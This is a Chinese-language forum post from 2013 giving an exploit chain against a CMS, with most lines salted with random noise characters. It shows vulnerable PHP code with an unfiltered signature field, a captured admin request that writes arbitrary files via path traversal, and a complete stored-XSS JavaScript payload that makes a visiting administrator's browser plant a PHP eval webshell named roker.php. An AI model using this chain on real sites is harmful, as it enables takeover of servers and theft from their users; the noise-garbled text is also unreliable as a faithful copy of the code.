|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
) x* `! w t- d7 W! |官网已经修补了,所以重新下了源码
, \; l9 K3 ?7 L9 e: s: T4 x因为 后台登入 还需要认证码 所以 注入就没看了。) U& I' s3 g. p/ p
存在 xss& @5 d% A5 E# |0 n. q+ E6 r+ X% D
漏洞文件 user/member/skin_edit.php: f4 S: K% c! l/ m6 J }# F
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:# I7 }9 ~$ t0 [; [( x, R& {
, r t0 d' Y. U& `6 p</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
& a9 F' i h% @) v; x8 Z ~ 8 T( C4 ~, k3 h! Q7 [
</textarea></td></tr>
% ]# z# B8 y0 m6 v" I
# k" Y% ]: j: s( v9 K$ j user/do.php 9 }: H4 P7 W$ Z% Q u5 V/ y
9 S- E9 q$ o3 ]* E
( q3 ^; y8 }6 [if($op=='zl'){ //资料
- I' Q7 c0 V$ ~. Y
8 V4 k2 V q8 e9 w% q/ N if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
# h: J# c H# `% o) K$ w5 o exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));' h4 Y, p0 v7 m1 a! G7 Z2 X# v6 {+ \6 }
6 d9 [ J B8 f2 X2 @
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',4 {0 F- ]3 U- ^- N
! m) J, `& o* i0 Y1 l. I
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
2 d$ ?0 p" M% U: m where CS_Name='".$cscms_name."'";
5 a- A$ ]! a4 F% v6 m& Q " F0 b' ]8 `! |) t0 K
if($db->query($sql)){
# q/ u! @4 E9 v+ q! H. ^* _
3 k) C T" I! U- Z7 W3 e4 ?$ \ exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
, q4 U/ }7 D& w& [8 k$ B4 Z
# R% V: `; d; E- ` }else{
3 |6 w5 n* X. P- @6 I8 r+ C . Q$ Y. \, v; h& @3 o0 @
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));8 e: a! R8 s8 x& f! H6 p: ]
, N1 y1 T8 G1 ~- O1 n2 ~2 f }* i3 f' \9 `4 Y& y
: u ^! I* O% g. ]) R- a) J; ^! A1 ~0 D
没有 过滤导致xss产生。4 K/ y) ~# C, ?% ?! b
后台 看了下 很奇葩的是可以写任意格式文件。。
5 S/ y- l$ I b! M1 D抓包。。
# ~: ~. I& v" W5 l& W
- I8 S3 }; H k" `* t" O1 q* a3 D; i+ t- [
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.10 c3 v' N X: @0 Q8 d( r# Z
/ u7 i0 Y% n+ F% H0 [2 R5 A6 {* v3 jAccept: text/html, application/xhtml+xml, */*7 ?0 e6 ?' S5 d* k* G( z
) D# Z$ h4 Z' E& `
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
N0 K6 }; F" N- S5 ~+ ]
0 R; \/ }& `2 q2 N I8 pAccept-Language: zh-CN
( P9 }5 d2 s5 x; s+ ?# @! M
0 y' i3 f p7 ]# b- K, g+ yUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
, m8 I/ _7 i0 ~* H+ x% Q " \3 W' J4 Q1 i h+ i
Content-Type: application/x-www-form-urlencoded, I- U9 o' E* a4 }+ Q) g! U5 w% U
8 u2 a d' r# L; t
Accept-Encoding: gzip, deflate
/ A" R$ {& W$ Q; `7 g2 e4 s% Q " F5 l3 ^/ r( k- n0 y
Host: 127.0.0.11 H( y. R7 x9 J+ J
: J; ?/ F$ x* h5 V0 l0 bContent-Length: 383 u. @% X0 l3 s& Y
* C. i4 [1 y+ t9 `" |' aDNT: 1$ {- t9 {, y. `. `, B9 c
9 l9 G. v% y6 S% `& X, tConnection: Keep-Alive
% z$ P: x& b1 Y ; Z3 P7 H( x$ _7 C, T6 N+ W
Cache-Control: no-cache9 V( A9 S; L8 z& H: z1 w
2 L2 o7 n$ k) Y R- Y1 } y
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
' Z) N; i& w. f# t0 q2 s3 X . a* Z$ K+ [( b' o
( t" t! u9 S' ~4 [0 ]6 \
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
9 `! S, n& n: F# D) `0 U* L
: I l( N9 g) z5 B: F( n. H3 L; [/ c, F s1 g! [& g5 ]2 }1 ]& L
! W, i6 w) t S- J+ r- C于是 构造js如下。
4 w: M! r0 [1 ]& K8 x9 F/ O8 `8 S S* e) B& s( ^
本帖隐藏的内容<script>
+ p4 ?1 J1 U* }$ `4 D8 X+ |& s+ ~thisTHost = top.location.hostname;. A/ A; [5 n- V& P% J4 v) T. ]
$ }/ P) P* e7 L8 SthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";" Y. U2 P2 ^" L, ^
& q( E! j3 S5 I* [0 D. X" ]& b
function PostSubmit(url, data, msg) {
/ O/ f+ P6 M) K1 V- c( Q: m6 _/ g; Q var postUrl = url;
1 e2 h1 P0 H6 ]! T6 ] 6 k2 J4 C# Z! i
var postData = data; ; L$ N, \3 u7 f% w
var msgData = msg; & t8 T5 g, \1 ?0 V8 m
var ExportForm = document.createElement("FORM");
7 K2 @! Y9 E7 C! ?* S8 K5 J document.body.appendChild(ExportForm);
3 I _& k4 T2 v4 a, L# N; _ ExportForm.method = "POST";
* V( e9 d6 c6 L3 C var newElement = document.createElement("input"); 6 u% |/ a$ N% P5 F2 d8 P
newElement.setAttribute("name", "name"); - Q7 D) T t P, n2 R
newElement.setAttribute("type", "hidden");
- v: K% N& U( j2 L5 \ var newElement2 = document.createElement("input"); 6 J) O! x5 n0 t! a5 ^. J
newElement2.setAttribute("name", "content"); - K! x1 I) A/ H! d2 d6 @1 n
newElement2.setAttribute("type", "hidden");
- {' V6 Z+ @% O3 A( @0 C% I% W ExportForm.appendChild(newElement);
+ Q) x6 s3 [+ }$ l4 x ExportForm.appendChild(newElement2); + u* @9 | |3 l- R2 E
newElement.value = postData;
% x4 @. @ @7 i1 T( F newElement2.value = msgData; . s' |2 Y, u+ e
ExportForm.action = postUrl;
5 z$ J% |, h) d. w3 `4 J- K* G# @ ExportForm.submit(); 9 m- J8 a+ g' V& b
};& V v9 G6 c2 ?9 E& Z9 z
' Z/ M. ~- V+ u
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
5 Q( \+ A8 G V; {" T5 W
4 T; t0 g$ z. L5 L5 z1 ~</script>0 `3 f* ^* K4 o( y& ^. b
' k( {% i( [- B# G; V0 s( C* U4 F& D7 }) i% ]
& \9 [% O8 u: F B
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
& Q. ^. u9 p. x! e+ B用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
" f; w3 F! N/ C, p. C& J5 {$ _就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
: Q: \4 y7 ^ K* x' n: T |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对